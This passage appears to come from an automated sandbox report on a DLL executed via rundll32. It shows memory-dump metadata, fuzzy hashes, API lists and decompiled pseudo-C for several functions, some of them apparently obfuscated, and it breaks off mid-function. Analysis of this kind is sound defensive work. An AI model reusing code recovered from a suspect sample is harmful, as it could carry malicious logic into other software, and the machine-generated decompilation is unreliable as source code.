                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 2395940807-0
                                • Opcode ID: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 35dbe73a7bb461abc9f03f03902340b94bb8d2f0b9dbf59d0741637dfc6f8abb
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 85%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                				signed int _t27;
                                				signed int _t28;
                                				signed int _t29;
                                				signed int _t30;
                                				signed int _t31;
                                				signed int _t43;
                                				signed int _t44;
                                				signed int _t45;
                                				signed int _t47;
                                				void* _t52;
                                
                                				_a8 = __rbx;
                                				_a16 = __rsi;
                                				_t27 = __ecx & 0x0000001f;
                                				if ((__ecx & 0x00000008) == 0) goto 0x130f6431;
                                				if (__edx >= 0) goto 0x130f6431;
                                				E00007FFC7FFC130F6BDC(_t27, _t52);
                                				_t28 = _t27 & 0xfffffff7;
                                				goto 0x130f6488;
                                				_t43 = 0x00000004 & dil;
                                				if (_t43 == 0) goto 0x130f644c;
                                				asm("dec eax");
                                				if (_t43 >= 0) goto 0x130f644c;
                                				E00007FFC7FFC130F6BDC(_t28, _t52);
                                				_t29 = _t28 & 0xfffffffb;
                                				goto 0x130f6488;
                                				_t44 = dil & 0x00000001;
                                				if (_t44 == 0) goto 0x130f6468;
                                				asm("dec eax");
                                				if (_t44 >= 0) goto 0x130f6468;
                                				E00007FFC7FFC130F6BDC(_t29, _t52);
                                				_t30 = _t29 & 0xfffffffe;
                                				goto 0x130f6488;
                                				_t45 = dil & 0x00000002;
                                				if (_t45 == 0) goto 0x130f6488;
                                				asm("dec eax");
                                				if (_t45 >= 0) goto 0x130f6488;
                                				if ((dil & 0x00000010) == 0) goto 0x130f6485;
                                				E00007FFC7FFC130F6BDC(_t30, _t52);
                                				_t31 = _t30 & 0xfffffffd;
                                				_t47 = dil & 0x00000010;
                                				if (_t47 == 0) goto 0x130f64a2;
                                				asm("dec eax");
                                				if (_t47 >= 0) goto 0x130f64a2;
                                				E00007FFC7FFC130F6BDC(_t31, _t52);
                                				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                			}














                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _set_statfp
                                • String ID:
                                • API String ID: 1156100317-0
                                • Opcode ID: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction ID: 964fa575040371325d65a34880e014d11f59a0afc52581298c705295d34a18fa
                                • Opcode Fuzzy Hash: 8e204902ee3cdeb9f77a3f964fa6f85e84bca92309d804b1f408b313ac172a76
                                • Instruction Fuzzy Hash: 8F11C426E18E3F0BF6542134DF4637911D96F453BCE080AB4E96E27AD6CE2D7461D231
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 58%
                                			E00007FFC7FFC130FA4A0(long long __rax, signed int __rcx, void* __rdx, void* __r9, intOrPtr _a16, intOrPtr _a80, intOrPtr _a88, intOrPtr _a96, intOrPtr _a104, intOrPtr _a120) {
                                				long long _v96;
                                				short _v104;
                                				void* __rbx;
                                				long long _t55;
                                				intOrPtr _t60;
                                				signed long long _t62;
                                				void* _t68;
                                				void* _t69;
                                
                                				_t55 = __rax;
                                				r8d = r8d + 4;
                                				_a104 = _a104 + 0xfffffdb4;
                                				r9d = __rcx - 0x30d5;
                                				_a96 = r8d;
                                				_a16 = r9d;
                                				_a120 = _a80 + 0xffffda68;
                                				if (_a120 + 0x18b7 - __r9 + 0x38e9 > 0) goto 0x130fa608;
                                				if (__rdx - 0xea2 - _a96 + 0xffffee57 <= 0) goto 0x130fa5fa;
                                				_t60 = _a88;
                                				_v96 = 0x38e9;
                                				r9d = 0x3666;
                                				_v104 = 0x2598;
                                				r8d = 0x37e1;
                                				E00007FFC7FFC130E9AC0(_t60, __rcx, _t60, _t69);
                                				 *((long long*)(_t60 + 0x348)) = _t55;
                                				_t62 = __rcx ^ 0x0000a532;
                                				 *(_t60 + 0x158) = _t62;
                                				if ( *( *((intOrPtr*)(_t60 + 0x1a0)) + 0xb0) * 0x4b917808 == 0x2598) goto 0x130fa5bc;
                                				 *(_t60 + 0x1b0) =  *(_t60 + 0x1b0) |  *( *((intOrPtr*)(_t60 + 0x1c0)) + 0x120) ^ 0x00002032;
                                				if (0x2599 != _t62) goto 0x130fa590;
                                				_v96 = 0x3189;
                                				r9d = 0x3666;
                                				_v104 = 0x30d5;
                                				r8d = 0x37e1;
                                				E00007FFC7FFC130E9AC0(_t60, _t62, _t60, _t69);
                                				 *((long long*)(_t60 + 0x350)) = 0x2599;
                                				 *((long long*)(_t60 + 0x120)) =  *((long long*)(_t60 + 0x120)) + 0xfffff73c;
                                				return _t68 + 0x2103;
                                			}












                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CreateCriticalFileHeapLeaveLockSection
                                • String ID: 8
                                • API String ID: 4149557297-406019892
                                • Opcode ID: 7dc74a2b659ee5eff0f1ee3774e6a1c62d1fe173903ebc6207a3731a296c528a
                                • Instruction ID: 5fe38b4b8d1eaab9386d1c2296811315ce8ec8f632313b3aa5417c44abe94267
                                • Opcode Fuzzy Hash: 7dc74a2b659ee5eff0f1ee3774e6a1c62d1fe173903ebc6207a3731a296c528a
                                • Instruction Fuzzy Hash: 19616D736086D48BD362CF15E544BDEB7A8FB88794F154139EB8957798CB38D990CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 16%
                                			E00007FFC7FFC130F4898(signed int __edx, void* __edi, void* __rax, signed long long __rbx, signed int* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed long long _a5176, void* _a5192) {
                                				intOrPtr _v0;
                                				signed long long _v8;
                                				int _t33;
                                				long _t37;
                                				void* _t38;
                                				signed int _t39;
                                				int _t48;
                                				signed long long _t60;
                                				short* _t65;
                                				signed int* _t66;
                                				void* _t82;
                                				void* _t89;
                                				void* _t95;
                                				void* _t98;
                                				void* _t101;
                                				void* _t102;
                                
                                				_a8 = __rbx;
                                				_a24 = __rbp;
                                				E00007FFC7FFC130F7050(_t38, __rax, __rcx, _t82, __r8, _t95, _t98);
                                				_t60 =  *0x13123760; // 0xb74f7d657c87
                                				_a5176 = _t60 ^ _t89 - __rax;
                                				r14d = r9d;
                                				r10d = r10d & 0x0000003f;
                                				_t102 = _t101 + __r8;
                                				 *__rcx =  *__rcx & 0x00000000;
                                				__rcx[1] =  *((intOrPtr*)(0x13124970 + (__edx >> 6) * 8));
                                				if (__r8 - _t102 >= 0) goto 0x130f49db;
                                				_t65 =  &_a40;
                                				if (__r8 - _t102 >= 0) goto 0x130f4943;
                                				_t39 =  *__r8 & 0x0000ffff;
                                				if (_t39 != 0xa) goto 0x130f492f;
                                				 *_t65 = 0xd;
                                				_t66 = _t65 + 2;
                                				 *_t66 = _t39;
                                				if ( &(_t66[0]) -  &_a1744 < 0) goto 0x130f4911;
                                				_a16 = _a16 & 0x00000000;
                                				_a8 = _a8 & 0x00000000;
                                				_v0 = 0xd55;
                                				_v8 =  &_a1752;
                                				r9d = 0;
                                				_t33 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
                                				_t48 = _t33;
                                				if (_t33 == 0) goto 0x130f49d3;
                                				if (_t33 == 0) goto 0x130f49c3;
                                				_v8 = _v8 & 0x00000000;
                                				r8d = _t48;
                                				r8d = r8d;
                                				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f49d3;
                                				if (0 + _a24 - _t48 < 0) goto 0x130f4990;
                                				__rcx[1] = __edi - r15d;
                                				goto 0x130f4906;
                                				_t37 = GetLastError();
                                				 *__rcx = _t37;
                                				E00007FFC7FFC130F6D80();
                                				return _t37;
                                			}




















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                • String ID: U
                                • API String ID: 2456169464-4171548499
                                • Opcode ID: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction ID: c6116eb31599becb4ad0f909fe8d585fdfe02209de7472e901fd323701e8414b
                                • Opcode Fuzzy Hash: a2d3cb67cfcf3dc513eb76f03ce482a2aef41a2ff1dbddf9374cbcdbadebe864
                                • Instruction Fuzzy Hash: E941F622B1CA5982EB20CF25E8043BA77A4FB887A8F414031EE8DA7788DF3CD511C750
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F20A8(signed int __edx, void* __eflags, intOrPtr* __rax, long long __rbx, signed int* __rcx, long long __rbp, long long _a8, char _a16, long long _a24) {
                                				void* _t43;
                                				signed int _t52;
                                				void* _t53;
                                				void* _t61;
                                				signed int _t64;
                                				signed char _t66;
                                				signed char _t75;
                                				signed int _t76;
                                				void* _t100;
                                				signed int _t109;
                                
                                				_t75 = __edx;
                                				_a8 = __rbx;
                                				_a24 = __rbp;
                                				 *__rcx = 0;
                                				r14d = r9d;
                                				_t76 = __edx;
                                				if (__eflags == 0) goto 0x130f211a;
                                				if (__eflags == 0) goto 0x130f20f9;
                                				if ((__edx & 0x00000003) - 1 == 1) goto 0x130f20f2;
                                				_t43 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t43);
                                				goto 0x130f211f;
                                				goto 0x130f211f;
                                				asm("sbb eax, eax");
                                				goto 0x130f211f;
                                				__rcx[1] = 0x80000000;
                                				_t52 = _t76 & 0x00000700;
                                				if ((_t75 & 0x00000008) == 0) goto 0x130f218b;
                                				if (_t52 == 0x100) goto 0x130f2184;
                                				if (_t52 == 0x200) goto 0x130f217d;
                                				if (_t52 == 0x300) goto 0x130f2176;
                                				if (_t52 == 0x400) goto 0x130f218b;
                                				if (_t52 == 0x500) goto 0x130f216f;
                                				if (_t52 == 0x600) goto 0x130f217d;
                                				_t100 = _t52 - 0x700;
                                				if (_t100 == 0) goto 0x130f216f;
                                				_t53 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t53);
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				goto 0x130f2190;
                                				__rcx[2] = 3;
                                				if (_t100 == 0) goto 0x130f21e2;
                                				if (_t100 == 0) goto 0x130f21db;
                                				if (_t100 == 0) goto 0x130f21d4;
                                				if (_t100 == 0) goto 0x130f21cd;
                                				if (_t100 == 0) goto 0x130f21be;
                                				_t61 = E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 0x16;
                                				E00007FFC7FFC130EE580(_t61);
                                				goto 0x130f21e4;
                                				sil = __rcx[1] == 0x80000000;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				goto 0x130f21e4;
                                				__rcx[5] = __rcx[5] & 0x00000000;
                                				bpl = 0x80;
                                				__rcx[3] = 0;
                                				__rcx[4] = 0x80;
                                				if ((bpl & dil) == 0) goto 0x130f21fd;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				if ((0x00008000 & _t76) != 0) goto 0x130f2225;
                                				if ((_t76 & 0x00074000) != 0) goto 0x130f2222;
                                				if (E00007FFC7FFC130F4DDC(_t75, __rax,  &_a16) != 0) goto 0x130f229b;
                                				if (_a16 == 0x8000) goto 0x130f2225;
                                				 *__rcx =  *__rcx | bpl;
                                				if ((0x00000100 & _t76) == 0) goto 0x130f2245;
                                				_t64 =  *0x13124dd4; // 0x0
                                				_t66 =  !_t64 & r14d;
                                				if ((bpl & _t66) != 0) goto 0x130f2245;
                                				__rcx[4] = 1;
                                				_t109 = dil & 0x00000040;
                                				if (_t109 == 0) goto 0x130f2259;
                                				asm("bts dword [ebx+0x14], 0x1a");
                                				asm("bts dword [ebx+0x4], 0x10");
                                				__rcx[3] = __rcx[3] | 0x00000004;
                                				asm("bt edi, 0xc");
                                				if (_t109 >= 0) goto 0x130f2262;
                                				__rcx[4] = __rcx[4] | 0x00000100;
                                				asm("bt edi, 0xd");
                                				if (_t109 >= 0) goto 0x130f226d;
                                				asm("bts dword [ebx+0x14], 0x19");
                                				if ((dil & 0x00000020) == 0) goto 0x130f227a;
                                				asm("bts dword [ebx+0x14], 0x1b");
                                				goto 0x130f2285;
                                				if ((dil & 0x00000010) == 0) goto 0x130f2285;
                                				asm("bts dword [ebx+0x14], 0x1c");
                                				return _t66;
                                			}














                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo$_get_daylight
                                • String ID:
                                • API String ID: 72036449-0
                                • Opcode ID: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction ID: a29df5b4091cd437e0b99f029867bc5ddfa8e1a5fa130d5ab96c2e0768c50546
                                • Opcode Fuzzy Hash: 67660066f3c68fdd4308071344f7ecc8aa1826a3df721fd6cf348863a24bedb4
                                • Instruction Fuzzy Hash: 6551A12AE0CE2F43F7A9692C8E0137A66DCBB50738F194475DB0D661D6CA2CE860C665
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E00007FFC7FFC130E2A70(long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r10) {
                                				void* __r13;
                                				void* __r14;
                                				void* __r15;
                                				intOrPtr _t93;
                                				intOrPtr _t99;
                                				signed int _t105;
                                				void* _t110;
                                				signed long long _t136;
                                				intOrPtr _t149;
                                				long long _t150;
                                				void* _t154;
                                				void* _t155;
                                				void* _t158;
                                				signed long long _t159;
                                				void* _t160;
                                				void* _t163;
                                				void* _t165;
                                				void* _t166;
                                				void* _t168;
                                				long long _t170;
                                				void* _t171;
                                
                                				r13d =  *(_t160 + 0x100);
                                				r10d = __r8 - 0x30d5;
                                				r12d =  *(_t160 + 0x108);
                                				r8d = __rcx - 0x1408;
                                				r13d = r13d + 0xffffda68;
                                				 *(_t160 + 0x100) = r10d;
                                				_t170 = __rdx;
                                				 *(_t160 + 0x108) = r8d;
                                				_t110 = __rcx + 0x61f;
                                				r9d = r9d + 0xffffeb0d;
                                				_t99 =  *((intOrPtr*)(_t160 + 0xf0)) + 0xffffd84e;
                                				 *((intOrPtr*)(_t160 + 0xd0)) = r9d;
                                				 *((intOrPtr*)(_t160 + 0xe8)) = _t99;
                                				r12d = r12d + 0xffffdc0a;
                                				r15d = r13d;
                                				if (_t99 - _t168 + 0x3189 >= 0) goto 0x130e2d94;
                                				if (_t99 - __r8 - 0x106 >= 0) goto 0x130e2d94;
                                				if (_t110 == _t154 - 0x3f3) goto 0x130e2d94;
                                				 *((long long*)(_t160 + 0xc8)) = __rbx;
                                				if (r12d - _t168 + 0x1f2c > 0) goto 0x130e2c16;
                                				_t149 =  *((intOrPtr*)(__rdx + 0x1c0));
                                				r9d = __r10 + 0x2598;
                                				_t136 =  *((intOrPtr*)(__rdx + 0x1e0));
                                				r10d = _t158 - 0x984;
                                				r11d = _t154 - 0x1956;
                                				r8d = _t166 + 0x2103;
                                				_t108 =  *(_t160 + 0x100) + 0x38e9;
                                				 *(__rdx + 0x68) =  *(_t149 + 0x188) * 0x5adf2c5c;
                                				 *(__rdx + 0xa0) = _t136 | 0x00002598;
                                				_t105 = _t168 + 0x27b2;
                                				 *((intOrPtr*)(_t160 + 0x60)) = _t154 - 0x12ab;
                                				 *(_t160 + 0x58) = r10d;
                                				 *((intOrPtr*)(_t160 + 0x50)) = r9d;
                                				 *((intOrPtr*)(_t160 + 0x48)) = r11d;
                                				 *((intOrPtr*)(_t160 + 0x40)) = _t155 + 0x4ca;
                                				 *((long long*)(__rdx + 0x1e0)) = _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59;
                                				 *(_t160 + 0x38) = _t105;
                                				 *(_t160 + 0x30) =  *(_t160 + 0x100) + 0x38e9;
                                				 *((long long*)(_t160 + 0x28)) = __rdx;
                                				 *((intOrPtr*)(_t160 + 0x20)) = _t110 + 0xffffeb3f;
                                				E00007FFC7FFC130FD5F0( *((intOrPtr*)(_t160 + 0xe0)) + 0x3f3, _t136 | 0x00002598, _t136 -  *((intOrPtr*)(_t149 + 0x198)) - 0x3a59, _t149, __r8, _t163, _t165, _t168, __rdx, _t171);
                                				goto 0x130e2d8c;
                                				_t150 = r13d;
                                				_t159 = r12d;
                                				 *((long long*)(_t160 + 0x70)) = _t150;
                                				if (_t150 - _t159 *  *(__rdx + 0x198) < 0) goto 0x130e2c95;
                                				GetProcessHeap();
                                				if (r13d + 4 - _t159 *  *(__rdx + 0x198) >= 0) goto 0x130e2c43;
                                				r13d = r15d;
                                				r8d =  *(_t160 + 0x108);
                                				r9d =  *((intOrPtr*)(_t160 + 0xd0));
                                				if ( *((intOrPtr*)(__rdx + 0x78)) ==  *((intOrPtr*)(__rdx + 0x1b8)) +  *((intOrPtr*)(__rdx + 0x110)) -  *((intOrPtr*)(__rdx + 0xb0))) goto 0x130e2d8c;
                                				if ( *((intOrPtr*)(_t160 + 0x70)) - ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d > 0) goto 0x130e2d8c;
                                				_t93 =  *((intOrPtr*)(__rdx + 0x78));
                                				if (_t93 - (_t154 + _t171 | _t105) > 0) goto 0x130e2d8c;
                                				asm("o16 nop [eax+eax]");
                                				 *(_t160 + 0x58) = 0x2743;
                                				 *((long long*)(_t160 + 0x50)) = 0x2de1;
                                				 *((long long*)(_t160 + 0x48)) = 0x19c7;
                                				r9d = 0x1ff4;
                                				 *((long long*)(_t160 + 0x40)) = 0x2e2f;
                                				r8d = 0x1c0c;
                                				 *(_t160 + 0x38) = 0x26f1;
                                				 *(_t160 + 0x30) = 0x1000;
                                				 *((long long*)(_t160 + 0x28)) = 0x1acd;
                                				 *((long long*)(_t160 + 0x20)) = 0x1f1c;
                                				 *0x13124160 = E00007FFC7FFC130FF8F0(_t93, _t108 & 0x00003189, _t93 - (_t154 + _t171 | _t105), ( *(__rdx + 0x1f0) ^  *(__rdx + 0x100)) + r9d,  *((intOrPtr*)(_t160 + 0x70)), _t108, _t163, _t165);
                                				r15d = r15d ^ r13d &  *(_t170 + 0x188);
                                				 *(_t170 + 0xb0) = r8d |  *(_t170 + 0xd8);
                                				if (_t93 + 3 - (_t154 + _t171 | _t105) <= 0) goto 0x130e2cf0;
                                				return _t171 + 0x1f2c;
                                			}

























                                APIs
                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFC130E906E), ref: 00007FFC130E2C61
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID: /.$C'$-
                                • API String ID: 54951025-1702015707
                                • Opcode ID: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction ID: ccf3e92e630272ccc681d54ddd9bba27e73fa56e96dc9c7f035c5c5169f8aead
                                • Opcode Fuzzy Hash: 672deff062b64fbc16a2a7a10c4d6b86e45e16b49530db53f8233d17ed392130
                                • Instruction Fuzzy Hash: 4A71BD72A08AD58AE720CB04E494BEEB3A8F78478CF110135DF8917B94DF78E595CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 68%
                                			E00007FFC7FFC130EF0D4(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r9, long long _a8) {
                                				void* _t4;
                                				void* _t9;
                                				intOrPtr _t11;
                                				intOrPtr _t14;
                                				void* _t23;
                                				void* _t29;
                                				void* _t32;
                                				void* _t33;
                                
                                				_t29 = __rdx;
                                				_t27 = __rcx;
                                				_t25 = __rbx;
                                				_t23 = __rax;
                                				_a8 = __rbx;
                                				GetLastError();
                                				_t11 =  *0x13123888; // 0x6
                                				if (_t11 == 0xffffffff) goto 0x130ef0fe;
                                				_t4 = E00007FFC7FFC130EF5BC(_t11, _t11 - 0xffffffff, __rax, __rbx, __rcx);
                                				if (__rax != 0) goto 0x130ef13f;
                                				E00007FFC7FFC130EE26C(_t4, _t27, _t29);
                                				_t32 = _t23;
                                				if (_t23 != 0) goto 0x130ef11e;
                                				E00007FFC7FFC130EE114(_t23, _t27);
                                				goto 0x130ef15a;
                                				_t14 =  *0x13123888; // 0x6
                                				if (E00007FFC7FFC130EF614(_t14, _t23, _t23, _t25, _t27, _t23, _t33) == 0) goto 0x130ef117;
                                				E00007FFC7FFC130EEE40(_t32, _t23);
                                				_t9 = E00007FFC7FFC130EE114(_t23, _t32);
                                				if (_t32 == 0) goto 0x130ef15a;
                                				SetLastError(??);
                                				return _t9;
                                			}












                                APIs
                                • GetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF0DE
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF146
                                • SetLastError.KERNEL32(?,?,?,00007FFC130F0459,?,?,?,?,?,?,?,00007FFC130F0611), ref: 00007FFC130EF15C
                                • abort.LIBCMT ref: 00007FFC130EF162
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLast$abort
                                • String ID:
                                • API String ID: 1447195878-0
                                • Opcode ID: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction ID: ce5543993cea57cd4835e1aa8729aae120ec9e7bb04bd31614269084bfa2f0fb
                                • Opcode Fuzzy Hash: b80548e2226a9047e0fa927df35b1d713155097b6e56f97f5563107f00a1dcaf
                                • Instruction Fuzzy Hash: 99019224B0AF6E42FA586774A55613821D18F487B8F25093CD91E267C2ED2CF869C230
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 35%
                                			E00007FFC7FFC130F9F80(intOrPtr __ecx, void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                                				void* __rdi;
                                				void* __rbp;
                                				void* __r12;
                                				signed short _t143;
                                				signed int _t145;
                                				signed int _t199;
                                				signed int _t205;
                                				intOrPtr _t206;
                                				signed int _t209;
                                				signed int _t211;
                                				signed short* _t239;
                                				void* _t241;
                                				signed long long _t242;
                                				void* _t246;
                                				signed long long _t248;
                                				void* _t250;
                                				CHAR* _t253;
                                				void* _t256;
                                				void* _t258;
                                				void* _t259;
                                				signed short* _t262;
                                				void* _t267;
                                				void* _t271;
                                				void* _t273;
                                				void* _t275;
                                				void* _t277;
                                
                                				_t267 = __r10;
                                				_t265 = __r9;
                                				_t246 = __rdx;
                                				_t241 = __rcx;
                                				 *((long long*)(_t258 + 0x18)) = __rbx;
                                				 *(_t258 + 0x20) = r9d;
                                				 *((intOrPtr*)(_t258 + 8)) = __ecx;
                                				_t259 = _t258 - 0x90;
                                				r12d =  *(_t259 + 0x100);
                                				r10d = __rdx + 0x354;
                                				_t239 =  *((intOrPtr*)(_t259 + 0xf0));
                                				r15d = r9d;
                                				 *(_t259 + 0x74) = __rdx - 0x3595;
                                				r13d = __rax - 0x228c;
                                				 *(_t259 + 0xf8) = __edx + 0xfffff21d;
                                				r11d = _t271 + 0x14c1;
                                				 *((intOrPtr*)(_t259 + 0x78)) =  *(_t259 + 0xf8) + 0x522;
                                				r14d = _t277 - 0x12f1;
                                				 *(_t259 + 0x7c) = r11d;
                                				 *(_t259 + 0x108) = _t277 - 0x145b;
                                				 *(_t259 + 0x80) = r14d;
                                				r9d = __rax - 0x11a9;
                                				r8d = __rax - 0x923;
                                				 *(_t259 + 0xd8) = r9d;
                                				 *(_t259 + 0x70) = r8d;
                                				_t206 = __rax - 0x11a9;
                                				 *((intOrPtr*)(_t259 + 0x84)) = _t206;
                                				 *(_t259 + 0x110) = __rax + 0x984;
                                				if (r14d - _t256 + 0x106 < 0) goto 0x130fa261;
                                				if (r15d == _t275 + 0x1663) goto 0x130fa261;
                                				_t239[0xac] = _t239[0x11e];
                                				r10d = r10d - 0x283;
                                				r8d = 0x343a;
                                				r9d = 0x329d;
                                				 *(_t259 + 0x88) = r10d;
                                				 *(_t259 + 0x50) = 0x13118090;
                                				 *(_t259 + 0x48) = 0x7d;
                                				 *(_t259 + 0x40) = 0x1a;
                                				 *(_t259 + 0x38) =  *((intOrPtr*)(_t239[0xe4] + 0x130)) - 0x23ef;
                                				 *(_t259 + 0x30) = 0x1e0;
